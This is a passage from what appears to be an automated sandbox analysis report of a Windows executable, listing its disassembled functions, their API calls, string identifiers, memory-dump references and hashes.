                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 3739ac6a446bdce72e3d0850967148100a13352fc358b4d01d5d5062fbbc8e5b
                                                                          • Instruction ID: fe7609705bef8a38558487606a5b9ae296e4df4e41c6a2779e9d93134b2bb055
                                                                          • Opcode Fuzzy Hash: 3739ac6a446bdce72e3d0850967148100a13352fc358b4d01d5d5062fbbc8e5b
                                                                          • Instruction Fuzzy Hash: D0A011C22A8002BC300822002C03CBB220EC8C2F30330882EFC0AC0080A8800C823EB2
                                                                          Function 00F1E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E51F
                                                                            • Part of subcall function 00F1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1E8D0
                                                                            • Part of subcall function 00F1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1E8E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 63336934f71c24e31aff5f7219864f35f96d7540743fe639fa0bd19b7908c0ce
                                                                          • Instruction ID: fe7609705bef8a38558487606a5b9ae296e4df4e41c6a2779e9d93134b2bb055
                                                                          • Opcode Fuzzy Hash: 63336934f71c24e31aff5f7219864f35f96d7540743fe639fa0bd19b7908c0ce
                                                                          • Instruction Fuzzy Hash: D0A011C22A8002BC300822002C03CBB220EC8C2F30330882EFC0AC0080A8800C823EB2
                                                                          Function 00F09F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEndOfFile.KERNELBASE(?,00F0903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00F09F0C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File
                                                                          • String ID:
                                                                          • API String ID: 749574446-0
                                                                          • Opcode ID: 7d36df185911fe0458a3b504954e47db89136dadc1128225dd9b3270994982cb
                                                                          • Instruction ID: 2308fcd362e8c3188aa15af6e5a7046564afd1462b0a675029248e9cf4f5b490
                                                                          • Opcode Fuzzy Hash: 7d36df185911fe0458a3b504954e47db89136dadc1128225dd9b3270994982cb
                                                                          • Instruction Fuzzy Hash: 33A0223008800E8BEE002B30CF0800C3B22FB20BC830002E8A00BCF0B2CB2B880BEB00
                                                                          Function 00F1AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetCurrentDirectoryW.KERNELBASE(?,00F1AE72,C:\Users\user\Desktop,00000000,00F4946A,00000006), ref: 00F1AC08
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory
                                                                          • String ID:
                                                                          • API String ID: 1611563598-0
                                                                          • Opcode ID: 88a3227593674f28574d0a8167ad8560e3a36672346b92ea41f91b66585af3b2
                                                                          • Instruction ID: be847fa6166e5e6cb0bc869aa25ce910928724b05acf163bbdc9e24f6d46554c
                                                                          • Opcode Fuzzy Hash: 88a3227593674f28574d0a8167ad8560e3a36672346b92ea41f91b66585af3b2
                                                                          • Instruction Fuzzy Hash: 1AA011302002008B8200AB328F0AA0EBAAAAFA2B20F00C028A00080030CB30C820BA00
                                                                          Function 00F09620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CloseHandle.KERNELBASE(000000FF,?,?,00F095D6,?,?,?,?,?,00F32641,000000FF), ref: 00F0963B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: d7c7a760468ed1c372e47ee285b793e4011d9ce68ce4aaab7d2ad88ff61e5509
                                                                          • Instruction ID: f77b057d48875259b5467cff5481513914c271901a35a6dbfaa454d6f5347a1a
                                                                          • Opcode Fuzzy Hash: d7c7a760468ed1c372e47ee285b793e4011d9ce68ce4aaab7d2ad88ff61e5509
                                                                          • Instruction Fuzzy Hash: 05F0E9708C5B059FDB308A64C44879277E86B12331F040B1ED0F2429E1E3B2658DBA40

                                                                          Non-executed Functions

                                                                          Function 00F1C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F1C2B1
                                                                          • EndDialog.USER32(?,00000006), ref: 00F1C2C4
                                                                          • GetDlgItem.USER32(?,0000006C), ref: 00F1C2E0
                                                                          • SetFocus.USER32(00000000), ref: 00F1C2E7
                                                                          • SetDlgItemTextW.USER32(?,00000065,?), ref: 00F1C321
                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F1C358
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00F1C36E
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F1C38C
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F1C39C
                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F1C3B8
                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F1C3D4
                                                                          • _swprintf.LIBCMT ref: 00F1C404
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F1C417
                                                                          • FindClose.KERNEL32(00000000), ref: 00F1C41E
                                                                          • _swprintf.LIBCMT ref: 00F1C477
                                                                          • SetDlgItemTextW.USER32(?,00000068,?), ref: 00F1C48A
                                                                          • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F1C4A7
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F1C4C7
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F1C4D7
                                                                          • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F1C4F1
                                                                          • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F1C509
                                                                          • _swprintf.LIBCMT ref: 00F1C535
                                                                          • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F1C548
                                                                          • _swprintf.LIBCMT ref: 00F1C59C
                                                                          • SetDlgItemTextW.USER32(?,00000069,?), ref: 00F1C5AF
                                                                            • Part of subcall function 00F1AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F1AF35
                                                                            • Part of subcall function 00F1AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F3E72C,?,?), ref: 00F1AF84
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                          • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                          • API String ID: 797121971-1840816070
                                                                          • Opcode ID: 4c599292bd8d518ec1e074c8fd6dfe4589faedcf617ec977dc3b8b6eee59f54d
                                                                          • Instruction ID: 1efacac4d33ad3e22a6a0e06a24a47b904a567aa79dab95c356c78c14a9b9882
                                                                          • Opcode Fuzzy Hash: 4c599292bd8d518ec1e074c8fd6dfe4589faedcf617ec977dc3b8b6eee59f54d
                                                                          • Instruction Fuzzy Hash: 7A91B4B2548348BBD321DBA0DC49FFB77ACEB8A714F044819F785D2081D775EA44AB62
                                                                          Function 00F06FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F06FAA
                                                                          • _wcslen.LIBCMT ref: 00F07013
                                                                          • _wcslen.LIBCMT ref: 00F07084
                                                                            • Part of subcall function 00F07A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07AAB
                                                                            • Part of subcall function 00F07A9C: GetLastError.KERNEL32 ref: 00F07AF1
                                                                            • Part of subcall function 00F07A9C: CloseHandle.KERNEL32(?), ref: 00F07B00
                                                                            • Part of subcall function 00F0A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00F0977F,?,?,00F095CF,?,?,?,?,?,00F32641,000000FF), ref: 00F0A1F1
                                                                            • Part of subcall function 00F0A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F0977F,?,?,00F095CF,?,?,?,?,?,00F32641), ref: 00F0A21F
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00F07139
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00F07155
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F07298
                                                                            • Part of subcall function 00F09DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F073BC,?,?,?,00000000), ref: 00F09DBC
                                                                            • Part of subcall function 00F09DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00F09E70
                                                                            • Part of subcall function 00F09620: CloseHandle.KERNELBASE(000000FF,?,?,00F095D6,?,?,?,?,?,00F32641,000000FF), ref: 00F0963B
                                                                            • Part of subcall function 00F0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A501
                                                                            • Part of subcall function 00F0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F0A325,?,?,?,00F0A175,?,00000001,00000000,?,?), ref: 00F0A532
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                          • API String ID: 3983180755-3508440684
                                                                          • Opcode ID: 697ec0c16bc46cc3ccce984ae8c96a391b48fa25c418b889cbfa4ec78e32cad4
                                                                          • Instruction ID: dab90e26188f1316bf863fa85aca8028ee37af368271aeaa8e5dba0ac1958a40
                                                                          • Opcode Fuzzy Hash: 697ec0c16bc46cc3ccce984ae8c96a391b48fa25c418b889cbfa4ec78e32cad4
                                                                          • Instruction Fuzzy Hash: C1C1D5B1D04708AAEB25EB74DC41BEEB7A8AF04310F004599F956E31C2D778BA44FB61
                                                                          Function 00F2D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: __floor_pentium4
                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                          • API String ID: 4168288129-2761157908
                                                                          • Opcode ID: 93227a22f2f66d196901aaf75ead93e3bba251d3021b4be63ff478a90bb2053f
                                                                          • Instruction ID: 4d39a365ae0fd8fd693cfbefcdca551b1afc1dd41df612b9892355866fcced55
                                                                          • Opcode Fuzzy Hash: 93227a22f2f66d196901aaf75ead93e3bba251d3021b4be63ff478a90bb2053f
                                                                          • Instruction Fuzzy Hash: A2C23D72E046388FDB25CE28ED407E9B7B5EB84315F2541EAD84DE7240E779AE819F40
                                                                          Function 00F032F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog_swprintf
                                                                          • String ID: CMT$h%u$hc%u
                                                                          • API String ID: 146138363-3282847064
                                                                          • Opcode ID: 65aab9fb4adede03ab87ddab4958fe95d9d4d79dbaef83c35f321cf8a16fe82d
                                                                          • Instruction ID: db86fe451ca24ef42b08a55de26248498a63fb40a8bf90dd5654c0d4ea38a086
                                                                          • Opcode Fuzzy Hash: 65aab9fb4adede03ab87ddab4958fe95d9d4d79dbaef83c35f321cf8a16fe82d
                                                                          • Instruction Fuzzy Hash: 8632C2716103849BDB14DF74CC95AE93BA9AF54300F084579FD8A8B2C2DB74AA49EB60
                                                                          Function 00F0286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F02874
                                                                          • _strlen.LIBCMT ref: 00F02E3F
                                                                            • Part of subcall function 00F102BA: __EH_prolog.LIBCMT ref: 00F102BF
                                                                            • Part of subcall function 00F11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F0BAE9,00000000,?,?,?,0001045C), ref: 00F11BA0
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F02F91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                          • String ID: CMT
                                                                          • API String ID: 1206968400-2756464174
                                                                          • Opcode ID: 221dc90d397f9ca1d6eef4efc256b1b6302c1ff102faaa179709ca97d13feda5
                                                                          • Instruction ID: 8488525e5707fda3cb078a2819fb04d639fa3d108d4310a0f88140018172d8f2
                                                                          • Opcode Fuzzy Hash: 221dc90d397f9ca1d6eef4efc256b1b6302c1ff102faaa179709ca97d13feda5
                                                                          • Instruction Fuzzy Hash: 02620671A002458FDB19DF38C8897EA7BA1BF54310F08457EEC9A8B2C2DB759945FB60
                                                                          Function 00F1F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F1F844
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00F1F910
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F1F930
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00F1F93A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 254469556-0
                                                                          • Opcode ID: 845dff03011f88966ce5d14d8f912dc4e19a19c6ddb17fba055dd9751651f01a
                                                                          • Instruction ID: 9371fd8bc90ed6bfd714189d9a1f50bd8c8354067fe7ac17025f9dfb237c0e7f
                                                                          • Opcode Fuzzy Hash: 845dff03011f88966ce5d14d8f912dc4e19a19c6ddb17fba055dd9751651f01a
                                                                          • Instruction Fuzzy Hash: 27312975D0521DDBDB20EFA4DD897CCBBB8AF08304F1041AAE40DAB250EB759B899F44
                                                                          Function 00F1E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(80000000,00F1E5E8,0000001C,00F1E7DD,00000000,?,?,?,?,?,?,?,00F1E5E8,00000004,00F61CEC,00F1E86D), ref: 00F1E6B4
                                                                          • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00F1E5E8,00000004,00F61CEC,00F1E86D), ref: 00F1E6CF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: InfoQuerySystemVirtual
                                                                          • String ID: D
                                                                          • API String ID: 401686933-2746444292
                                                                          • Opcode ID: 3a3968a3f41497ba3299c4ead4ee3ab62730b92c45944cd7e4b9af80feaa7d71
                                                                          • Instruction ID: 42e907899442f1a9b6243ef2f4610f2d09a227e028f7f2366ca102c289f8c85a
                                                                          • Opcode Fuzzy Hash: 3a3968a3f41497ba3299c4ead4ee3ab62730b92c45944cd7e4b9af80feaa7d71
                                                                          • Instruction Fuzzy Hash: 8E01F732A001096BDB14DE29DC09BDD7BAAAFC4334F0CC120ED19D7150D738D9459680
                                                                          Function 00F28EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F28FB5
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F28FBF
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F28FCC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          • Opcode ID: 19658d231018431c22be4ae1f7ca2478d52981096f79828af6445fa59a050dc7
                                                                          • Instruction ID: 7dfacf09ec4a12109cd6cd53905d6f0097e02d59cce3ac330d7a0c3ea553bb83
                                                                          • Opcode Fuzzy Hash: 19658d231018431c22be4ae1f7ca2478d52981096f79828af6445fa59a050dc7
                                                                          • Instruction Fuzzy Hash: FD31D775D0122C9BCB21DF64DD887DCBBB4AF08320F5041EAE41CA6250EB749F859F44
                                                                          Function 00F2D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
